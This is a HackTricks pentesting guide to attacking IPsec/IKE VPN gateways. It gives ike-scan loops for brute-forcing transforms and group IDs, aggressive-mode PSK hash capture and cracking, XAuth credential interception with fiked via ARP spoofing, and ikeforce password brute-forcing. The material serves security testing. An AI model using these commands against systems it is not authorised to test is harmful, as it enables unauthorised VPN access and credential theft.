hacktricks/network-services-pentesting/ipsec-ike-vpn-pentesting.md
2024-12-12 11:39:29 +01:00

300 lines
18 KiB
Markdown

# 500/udp - Pentesting IPsec/IKE VPN
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{% endhint %}
## Basic Information
**IPsec** is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions.
The establishment of a **security association (SA)** between two points is managed by **IKE**, which operates under the umbrella of ISAKMP, a protocol designed for the authentication and key exchange. This process unfolds in several phases:
* **Phase 1:** A secure channel is created between two endpoints. This is achieved through the use of a Pre-Shared Key (PSK) or certificates, employing either main mode, which involves three pairs of messages, or **aggressive mode**.
* **Phase 1.5:** Though not mandatory, this phase, known as the Extended Authentication Phase, verifies the identity of the user attempting to connect by requiring a username and password.
* **Phase 2:** This phase is dedicated to negotiating the parameters for securing data with **ESP** and **AH**. It allows for the use of algorithms different from those in Phase 1 to ensure **Perfect Forward Secrecy (PFS)**, enhancing security.
**Default port:** 500/udp
## **Discover** the service using nmap
```
root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT STATE SERVICE
500/udp open isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
```
## **Finding a valid transformation**
The IPSec configuration can be prepared only to accept one or a few transformations. A transformation is a combination of values. **Each transform** contains a number of attributes like DES or 3DES as the **encryption algorithm**, SHA or MD5 as the **integrity algorithm**, a pre-shared key as the **authentication type**, Diffie-Hellman 1 or 2 as the key **distribution algorithm** and 28800 seconds as the **lifetime**.
Then, the first thing that you have to do is to **find a valid transformation**, so the server will talk to you. To do so, you can use the tool **ike-scan**. By default, Ike-scan works in main mode, and sends a packet to the gateway with an ISAKMP header and a single proposal with **eight transforms inside it**.
Depending on the response you can obtain some information about the endpoint:
```
root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
```
As you can see in the previous response, there is a field called **AUTH** with the value **PSK**. This means that the vpn is configured using a preshared key (and this is really good for a pentester).\
**The value of the last line is also very important:**
* _0 returned handshake; 0 returned notify:_ This means the target is **not an IPsec gateway**.
* _**1 returned handshake; 0 returned notify:**_ This means the **target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable** (a valid transform will be shown in the output).
* _0 returned handshake; 1 returned notify:_ VPN gateways respond with a notify message when **none of the transforms are acceptable** (though some gateways do not, in which case further analysis and a revised proposal should be tried).
Then, in this case we already have a valid transformation but if you are in the 3rd case, then you need to **brute-force a little bit to find a valid transformation:**
First of all you need to create all the possible transformations:
```bash
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
```
And then brute-force each one using ike-scan (this can take several minutes):
```bash
while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
```
If the brute-force didn't work, maybe the server is responding without handshakes even to valid transforms. Then, you could try the same brute-force but using aggressive mode:
```bash
while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
```
Hopefully **a valid transformation is echoed back**.\
You can try the **same attack** using [**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py).\
You could also try to brute force transformations with [**ikeforce**](https://github.com/SpiderLabs/ikeforce):
```bash
./ikeforce.py <IP> # No parameters are required for scan -h for additional help
```
![](<../.gitbook/assets/image (617).png>)
In **DH Group: 14 = 2048-bit MODP** and **15 = 3072-bit**\
**2 = HMAC-SHA = SHA1 (in this case). The `--trans` format is $Enc,$Hash,$Auth,$DH**
Cisco indicates to avoid using DH groups 1 and 2 because they're not strong enough. Experts believe that **countries with a lot of resources can easily break the encryption** of data that uses these weak groups. This is done by using a special method that prepares them to crack the codes quickly. Even though it costs a lot of money to set up this method, it allows these powerful countries to read the encrypted data in real time if it's using a group that's not strong (like 1,024-bit or smaller).
### Server fingerprinting
Then, you can use ike-scan to try to **discover the vendor** of the device. The tool send an initial proposal and stops replaying. Then, it will **analyze** the **time** difference **between** the received **messages** from the server and the matching response pattern, the pentester can successfully fingerprint the VPN gateway vendor. More over, some VPN servers will use the optional **Vendor ID (VID) payload** with IKE.
**Specify the valid transformation if needed** (using --trans)
If IKE discover which is the vendor it will print it:
```
root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
IKE Backoff Patterns:
IP Address No. Recv time Delta Time
172.16.21.200 1 1322286031.744904 0.000000
172.16.21.200 2 1322286039.745081 8.000177
172.16.21.200 3 1322286047.745989 8.000908
172.16.21.200 4 1322286055.746972 8.000983
172.16.21.200 Implementation guess: Cisco VPN Concentrator
Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
```
This can be also achieve with nmap script _**ike-version**_
## Finding the correct ID (group name)
For being allowed to capture the hash you need a valid transformation supporting Aggressive mode and the correct ID (group name). You probably won't know the valid group name, so you will have to brute-force it.\
To do so, I would recommend you 2 methods:
### Bruteforcing ID with ike-scan
First of all try to make a request with a fake ID trying to gather the hash ("-P"):
```bash
ike-scan -P -M -A -n fakeID <IP>
```
If **no hash is returned**, then probably this method of brute forcing will work. **If some hash is returned, this means that a fake hash is going to be sent back for a fake ID, so this method won't be reliable** to brute-force the ID. For example, a fake hash could be returned (this happens in modern versions):
![](<../.gitbook/assets/image (917).png>)
But if as I have said, no hash is returned, then you should try to brute-force common group names using ike-scan.
This script **will try to brute-force possible IDs** and will return the IDs where a valid handshake is returned (this will be a valid group name).
If you have discovered an specific transformation add it in the ike-scan command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of them is working properly).
You can use the[ dictionary of ikeforce](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic) or [the one in seclists](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt) of common group names to brute-force them:
```bash
while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
```
Or use this dict (is a combination of the other 2 dicts without repetitions):
{% file src="../.gitbook/assets/vpnIDs.txt" %}
### Bruteforcing ID with Iker
[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) also uses **ike-scan** to bruteforce possible group names. It follows it's own method to **find a valid ID based on the output of ike-scan**.
### Bruteforcing ID with ikeforce
[**ikeforce.py**](https://github.com/SpiderLabs/ikeforce) is a tool that can be used to **brute force IDs also**. This tool will **try to exploit different vulnerabilities** that could be used to **distinguish between a valid and a non-valid ID** (could have false positives and false negatives, that is why I prefer to use the ike-scan method if possible).
By default **ikeforce** will send at the beginning some random ids to check the behaviour of the server and determinate the tactic to use.
* The **first method** is to brute-force the group names by **searching** for the information **Dead Peer Detection DPD** of Cisco systems (this info is only replayed by the server if the group name is correct).
* The **second method** available is to **checks the number of responses sent to each try** because sometimes more packets are sent when the correct id is used.
* The **third method** consist on **searching for "INVALID-ID-INFORMATION" in response to incorrect ID**.
* Finally, if the server does not replay anything to the checks, **ikeforce** will try to brute force the server and check if when the correct id is sent the server replay with some packet.\
Obviously, the goal of brute forcing the id is to get the **PSK** when you have a valid id. Then, with the **id** and **PSK** you will have to bruteforce the XAUTH (if it is enabled).
If you have discovered an specific transformation add it in the ikeforce command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of them is working properly).
```bash
git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
```
```bash
./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic
```
### Sniffing ID
(From the book **Network Security Assessment: Know Your Network**): It is also possible to obtain valid usernames by sniffing the connection between the VPN client and server, as the first aggressive mode packet containing the client ID is sent in the clear
![](<../.gitbook/assets/image (891).png>)
## Capturing & cracking the hash
Finally, If you have found a **valid transformation** and the **group name** and if the **aggressive mode is allowed**, then you can very easily grab the crackable hash:
```bash
ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor
```
The hash will be saved inside _hash.txt_.
You can use **psk-crack**, **john** (using [**ikescan2john.py**](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py)) and **hashcat** to **crack** the hash:
```bash
psk-crack -d <Wordlist_path> psk.txt
```
## **XAuth**
**Aggressive mode IKE** combined with a **Pre-Shared Key (PSK)** is commonly employed for **group authentication** purposes. This method is augmented by **XAuth (Extended Authentication)**, which serves to introduce an additional layer of **user authentication**. Such authentication typically leverages services like **Microsoft Active Directory**, **RADIUS**, or comparable systems.
Transitioning to **IKEv2**, a notable shift is observed where **EAP (Extensible Authentication Protocol)** is utilized in lieu of **XAuth** for the purpose of authenticating users. This change underscores an evolution in authentication practices within secure communication protocols.
### Local network MitM to capture credentials
So you can capture the data of the login using _fiked_ and see if there is any default username (You need to redirect IKE traffic to `fiked` for sniffing, which can be done with the help of ARP spoofing, [more info](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/)). Fiked will act as a VPN endpoint and will capture the XAuth credentials:
```bash
fiked -g <IP> -k testgroup:secretkey -l output.txt -d
```
Also, using IPSec try to make a MitM attack and block all traffic to port 500, if the IPSec tunnel cannot be established maybe the traffic will be sent in clear.
### Brute-forcing XAUTH username ad password with ikeforce
To brute force the **XAUTH** (when you know a valid group name **id** and the **psk**) you can use a username or list of usernames and a list o passwords:
```bash
./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]
```
This way, ikeforce will try to connect using each combination of username:password.
If you found one or several valid transforms just use them like in the previous steps.
## Authentication with an IPSEC VPN
In Kali, **VPNC** is utilized to establish IPsec tunnels. The **profiles** must be located in the directory `/etc/vpnc/`. You can initiate these profiles using the command _**vpnc**_.
The following commands and configurations illustrate the process of setting up a VPN connection with VPNC:
```bash
root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0
```
In this setup:
* Replace `[VPN_GATEWAY_IP]` with the actual IP address of the VPN gateway.
* Replace `[VPN_CONNECTION_ID]` with the identifier for the VPN connection.
* Replace `[VPN_GROUP_SECRET]` with the VPN's group secret.
* Replace `[VPN_USERNAME]` and `[VPN_PASSWORD]` with the VPN authentication credentials.
* `[PID]` symbolizes the process ID that will be assigned when `vpnc` initiates.
Ensure that actual, secure values are used to replace the placeholders when configuring the VPN.
## Reference Material
* [PSK cracking paper](http://www.ernw.de/download/pskattack.pdf)
* [SecurityFocus Infocus](http://www.securityfocus.com/infocus/1821)
* [Scanning a VPN Implementation](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf)
* Network Security Assessment 3rd Edition
## Shodan
* `port:500 IKE`
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
</details>
{% endhint %}